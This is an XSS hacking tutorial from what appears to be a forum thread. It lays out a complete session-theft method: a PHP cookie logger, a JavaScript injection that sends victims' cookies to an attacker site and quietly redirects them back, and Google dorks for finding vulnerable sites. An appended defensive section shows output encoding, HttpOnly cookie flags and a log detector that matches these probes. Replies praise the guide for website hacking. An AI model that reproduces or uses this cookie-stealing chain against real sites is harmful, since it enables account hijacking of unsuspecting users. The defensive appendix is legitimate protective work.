★ Ultimate XSS guide by Spitzy ★

Spitzy

Hello there and welcome to my guide to XSS

Before we start, what is XSS? Let's go back to basics! Hmm, what is a cookie? No, I don't mean the cookies you eat.


Cookie:
A cookie is the variable that web-browsers use to store your login credentials. Without a cookie, you cannot "stay logged in" on websites.

CROSS SITE SCRIPTING or XSS:
Cross-Site Scripting is the process of injecting JavaScript (mainly) and also HTML into a webpage.

SOME POINTS ON XSS:
- XSS attacks almost always focus upon sites which use cookies for storing our username and password.
- XSS is used to harm the website (maybe defacing).

Okay, so let's get started now.


The usual types: type 1, type 2, type 3


Type 1 = DOM-based:
DOM-based is an XSS attack wherein the attack payload is executed as a result of modifying the DOM "environment" in the slave's browser used by the original client-side script, so that the client-side code runs in an "unexpected" manner. That is, the page itself (the HTTP response, that is) does not change, but the client-side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.

Type 2 = Non-persistent:
It means that the injected code is not permanent and lasts only a short time, while the user is on the page or has the URL with the malicious code.

Type 3 = Persistent:
It means that the injected code is permanent and will stay on the site, and the output can be seen by any user of the site.


Now the question is: how do we check whether the site is XSS vulnerable or not?
There are two methods to check this:


1. POST: http://www.target.com/search.php (we put malicious code in the search engine)
Code:
<script>alert("xss");</script>

2. GET: http://www.target.com/search=<script>alert("xss");</script>
We directly put the script in the URL of the browser.

What else can we do?
--> Insert image:
Code:
<img src="url of the image">

--> Insert message:
<b>this is hacked </b>

--> Redirect to your page:
Code:
<script>window.open( "http://www.yoursite.com/" )</script>


But the main aim of XSS is to steal cookies, so here is cookie stealing.
COOKIE STEALING TUTORIAL:
Code:
<?php
 
function GetIP()
{
        if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
                $ip = getenv("HTTP_CLIENT_IP");
        else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
                $ip = getenv("HTTP_X_FORWARDED_FOR");
        else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
                $ip = getenv("REMOTE_ADDR");
        else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
                $ip = $_SERVER['REMOTE_ADDR'];
        else
                $ip = "unknown";
        return($ip);
}
 
function logData()
{
        $ipLog="log.txt";
        $cookie = $_SERVER['QUERY_STRING'];
        $register_globals = (bool) ini_get('register_gobals');
        if ($register_globals) $ip = getenv('REMOTE_ADDR');
        else $ip = GetIP();
 
        $rem_port = $_SERVER['REMOTE_PORT'];
        $user_agent = $_SERVER['HTTP_USER_AGENT'];
        $rqst_method = $_SERVER['METHOD'];
        $rem_host = $_SERVER['REMOTE_HOST'];
        $referer = $_SERVER['HTTP_REFERER'];
        $date=date ("l dS of F Y h:i:s A");
        $log=fopen("$ipLog", "a+");
 
        if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
                fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
        else
                fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
        fclose($log);
}
 
logData();
 
?>


Now, how to use this code?
This is done by a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt and giveyourname.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this PHP code into your cookie stealer script (giveyourname.php) [code mentioned above].
The above script will record the cookies of every user that views it.

Code:
<script language= "JavaScript">document.location="http://yoursite.com/giveyourname.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>

Now the above code is injected into the XSS-vulnerable site page via the GET or POST method. What does this code do?
The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.

If this code works then you'll automatically get the cookie on your site; otherwise you have to do some hard work! Grab the link which you get after the insertion of the above script, and manually get someone to use that link if necessary. Oops, all is done at this point.

All you need to do now is go to your website and check the log file.


You can try and look here:
Code:
SEARCH BOX
SHOUT BOX
BLOGS
COMMENT BOX
LOGIN BOX
FEEDBACK FORMS

That's it, thanks for reading my tutorial, more to come !

Code:
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
/preaspjobboard//Employee/emp_login.asp?msg1=
pages/match_report.php?mid=

These are some dorks you can use on Google to find XSS websites.
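For the defensive side of what this tutorial walks through, here is an added example (not from the post above): a reflected search page in its vulnerable and output-encoded forms, the cookie flags that keep a session cookie out of `document.cookie`, and a check that flags the probe payloads from the post in constructed web-server access-log lines. The log lines, IPs and `collector.example` host are made up for the example.

```python
import html
import re
from urllib.parse import unquote_plus

# Hypothetical search page: the reflected ("non-persistent") case from the post,
# where the query is echoed straight back into the HTML response.
def render_search_unsafe(query: str) -> str:
    return f"<p>Results for: {query}</p>"  # payload lands in the page as markup

# Hardened form: HTML-encode on output, so the same input renders as plain text.
def render_search_safe(query: str) -> str:
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"

# Session cookie flags that blunt the cookie-stealing script in the post:
# HttpOnly keeps the value out of document.cookie; Secure/SameSite limit where it is sent.
def session_cookie_header(session_id: str) -> str:
    return f"Set-Cookie: session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"

# Markers for the probes shown in the post (script tags, cookie access, redirects),
# matched after URL-decoding and case-insensitively.
XSS_MARKERS = re.compile(
    r"<script|</script|javascript:|document\.cookie|document\.location|onerror\s*=|onload\s*=",
    re.IGNORECASE,
)

def is_xss_probe(request_path: str) -> bool:
    """True if the decoded request path carries an XSS marker."""
    decoded = unquote_plus(unquote_plus(request_path))  # decode twice to catch %253C
    return bool(XSS_MARKERS.search(decoded))

def find_xss_probes(access_log: str) -> list:
    """Return (client_ip, path) for each common-log-format line whose path looks like a probe."""
    hits = []
    for line in access_log.splitlines():
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})', line)
        if m and is_xss_probe(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?search=%3Cscript%3Ealert(%22xss%22)%3B%3C%2Fscript%3E HTTP/1.1" 200
198.51.100.2 - - [10/Oct/2023:13:55:40 +0000] "GET /search.php?search=blue+widgets HTTP/1.1" 200
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /search.php?search=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fcollector.example%2Fc.php%3Fcookie%3D%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200
"""

if __name__ == "__main__":
    for ip, path in find_xss_probes(SAMPLE_LOG):
        print("possible XSS probe from", ip, "->", path[:60])
```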
 
Thanks for this man. This will help me get deeper into website hacking. Actually, I never knew that there was XSS hacking.
 
Bumping this in case someone wants to learn XSS hacking.
 